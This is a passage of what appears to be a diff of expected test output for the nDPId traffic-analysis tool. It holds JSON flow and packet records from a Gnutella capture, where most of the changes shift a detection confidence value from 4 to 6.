00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2114,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":1,"flow_last_seen":123912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":123912,"pkt":"UlQAEjUCCAAn5uVZCABFAABt60MAAIARl6IKAAIP3cbNxHAJUSoAWRoYg28xAvjrsUFUSfHbBKidMkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2114,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":123912,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.198.205.196","src_port":28681,"dst_port":20778,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2114,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":123912,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.198.205.196","src_port":28681,"dst_port":20778,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2115,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":123912,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":28681,"dst_port":54130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2115,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":1,"flow_last_seen":123912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":123912,"pkt":"UlQAEjUCCAAn5uVZCABFAABtoEYAAIAR\/8UKAAIPV3s26nAJ03IAWfTcKgkxAlGmPJUzLkH07Ma7h0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2115,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":123912,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":28681,"dst_port":54130,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2115,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":123912,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":28681,"dst_port":54130,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
01410{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2118,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":2,"flow_last_seen":124065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":124065,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBkcAAEARuhndxs3ECgACD1EqcAkC3zKOg28xAvjrsUFUSfHbBKidMkQAAMACAAAGR1RLRwAAhAWx\/4G\/aeOxkw5wrlcHOTlCresE3cbNxFEqAQAAAAT9knizFEdUS0cAAIPPdMtTw3ywAQrcKHskULaFt8T9BFd7NurTckdUS0cAAIBDDfCNVDqFgBWTNBe\/R1a2V7AXBLm7Sq3Q8UdUS0cAAI1c\/QX9I39S2eczHf8bGxQqBh3SBCaOd+rCRFdTSFIAAIsML3baZ9qjEzov01XuwUWPp8CvBBiB6TxOFldTSFIAAIgInuBYn2DWNYTpgSOhE3nGOSSqBGLQGpoTgldTSFIAAJMpLUy99S6l5+o3G\/7HZbY0zUPGBFnUW5sUS1NOT1cAAJJLJdecP9uDvZhuUeP7MwcedtuWBM8mo+QaekdUS0cAAJ6Xxzbx1oA8a67zMFTEYzHds+ukBEziVWkYyldTSFIAAJ7Bez1ZQQgPxovuLAykgS8CMrDdBLAKqQox\/0dUS0cAAJp\/6ofTpH0Z7c9sfONgy\/6jjg5ZBFTFYV4FUFdTSFIAAJgFqYyWS9v2Yq4KyYrmzTVJWc5SBGP6\/WMuK0dUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO0dUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAALd6AZ7svQKtiRxAHRTzpxSemu\/LBNXlb+ATDEdUS0cAALSr6ArQaneMzMJ81PWuqjO12gqLBLV2NdR1LkdUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSEdUS0cAALFbZ+HgSIrho0RaGRNTd1qTgMZFBC0fmHBo40dUS0cAAL1cZVAaZZhJTOPlkpw6jfT8aYRtBD\/kr6kHkA=="} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2119,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":3,"flow_last_seen":124065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":124065,"pkt":"UlQAEjUCCAAn5uVZCABFAABtOI8AAIAR8XkKAAIPubtKrXAJ0PEAWeogCGsxAoAKiW4WeGL5TjmTYEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 
00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2120,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124066,"flow_last_seen":124066,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124066,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":28681,"dst_port":49732,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2120,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":1,"flow_last_seen":124066,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":124066,"pkt":"UlQAEjUCCAAn5uVZCABFAABtpB8AAIAR69kKAAIPJo536nAJwkQAWcjqSEIxAiBrw4qXLe42xzCJ9UQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2120,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124066,"flow_last_seen":124066,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124066,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":28681,"dst_port":49732,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2120,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124066,"flow_last_seen":124066,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124066,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":28681,"dst_port":49732,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2121,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124066,"flow_last_seen":124066,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124066,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.129.233.60","src_port":28681,"dst_port":19990,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2121,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":124066,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":124066,"pkt":"UlQAEjUCCAAn5uVZCABFAABtsCgAAIARfIsKAAIPGIHpPHAJThYAWZr\/PMAxAkVlEJdEiTyKQUzsekQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2121,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124066,"flow_last_seen":124066,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124066,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.129.233.60","src_port":28681,"dst_port":19990,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2121,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124066,"flow_last_seen":124066,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124066,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.129.233.60","src_port":28681,"dst_port":19990,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2123,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.208.26.154","src_port":28681,"dst_port":4994,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2123,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":124090,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":124090,"pkt":"UlQAEjUCCAAn5uVZCABFAABtt4sAAIAR+XsKAAIPYtAamnAJE4IAWYPzFGQxAgG2rIRjjgWOdH93UEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2123,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.208.26.154","src_port":28681,"dst_port":4994,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2123,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.208.26.154","src_port":28681,"dst_port":4994,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2124,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.212.91.155","src_port":28681,"dst_port":5195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2124,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":1,"flow_last_seen":124090,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":124090,"pkt":"UlQAEjUCCAAn5uVZCABFAABt2TsAAIARn8YKAAIPWdRbm3AJFEsAWd1KrbwxApZ9ZL+wNENsMFG4eUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2124,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.212.91.155","src_port":28681,"dst_port":5195,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2124,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.212.91.155","src_port":28681,"dst_port":5195,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":28681,"dst_port":6778,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":124090,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":124090,"pkt":"UlQAEjUCCAAn5uVZCABFAABtN+oAAIARg3wKAAIPzyaj5HAJGnoAWUl8GqIxAsDHb8ARC\/TCVyKtTkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":28681,"dst_port":6778,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":28681,"dst_port":6778,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2126,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":2,"flow_last_seen":124181,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":124181,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBkkAAEARxyomjnfqCgACD8JEcAkC3z99SEIxAiBrw4qXLe42xzCJ9UQAAMACAAAGR1RLRwAAjVz9Bf0jf1LZ5zMd\/xsbFCoGHdIEJo536sJEAQAAAAT9X3JyFEdUS0cAAIQFsf+Bv2njsZMOcK5XBzk5Qq3rBN3GzcRRKkdUS0cAAIPPdMtTw3ywAQrcKHskULaFt8T9BFd7NurTckdUS0cAAIBDDfCNVDqFgBWTNBe\/R1a2V7AXBLm7Sq3Q8VdTSFIAAIsML3baZ9qjEzov01XuwUWPp8CvBBiB6TxOFldTSFIAAIgInuBYn2DWNYTpgSOhE3nGOSSqBGLQGpoTgldTSFIAAJMpLUy99S6l5+o3G\/7HZbY0zUPGBFnUW5sUS1NOT1cAAJJLJdecP9uDvZhuUeP7MwcedtuWBM8mo+QaekdUS0cAAJ6Xxzbx1oA8a67zMFTEYzHds+ukBEziVWkYyldTSFIAAJ7Bez1ZQQgPxovuLAykgS8CMrDdBLAKqQox\/0dUS0cAAJp\/6ofTpH0Z7c9sfONgy\/6jjg5ZBFTFYV4FUFdTSFIAAJgFqYyWS9v2Yq4KyYrmzTVJWc5SBGP6\/WMuK0dUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO0dUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAALd6AZ7svQKtiRxAHRTzpxSemu\/LBNXlb+ATDEdUS0cAA
LSr6ArQaneMzMJ81PWuqjO12gqLBLV2NdR1LkdUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSEdUS0cAALFbZ+HgSIrho0RaGRNTd1qTgMZFBC0fmHBo40dUS0cAAL1cZVAaZZhJTOPlkpw6jfT8aYRtBD\/kr6kHkA=="} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2164,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":126831,"flow_last_seen":126831,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":126831,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2164,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":126831,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":126831,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bCBAAIAGmjkKAAIPRXai5cSatzq0d6IdAAAAAIAC+vCtSgAAAgQFtAEDAwgBAQQC"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2165,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":2,"flow_last_seen":126943,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":126943,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsBmMAAEAGf\/9FdqLlCgACD7c6xJoBCaABtHeiHmAS\/\/8wNgAAAgQFtA=="} 
00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2166,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":3,"flow_last_seen":126943,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":126943,"pkt":"UlQAEjUCCAAn5uVZCABFAAAobCFAAIAGmkQKAAIPRXai5cSatzq0d6IeAQmgAlAQ+vBNAgAA"} -00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2167,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":126831,"flow_last_seen":126944,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":513,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":126944,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2167,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":126831,"flow_last_seen":126944,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":513,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":126944,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": 
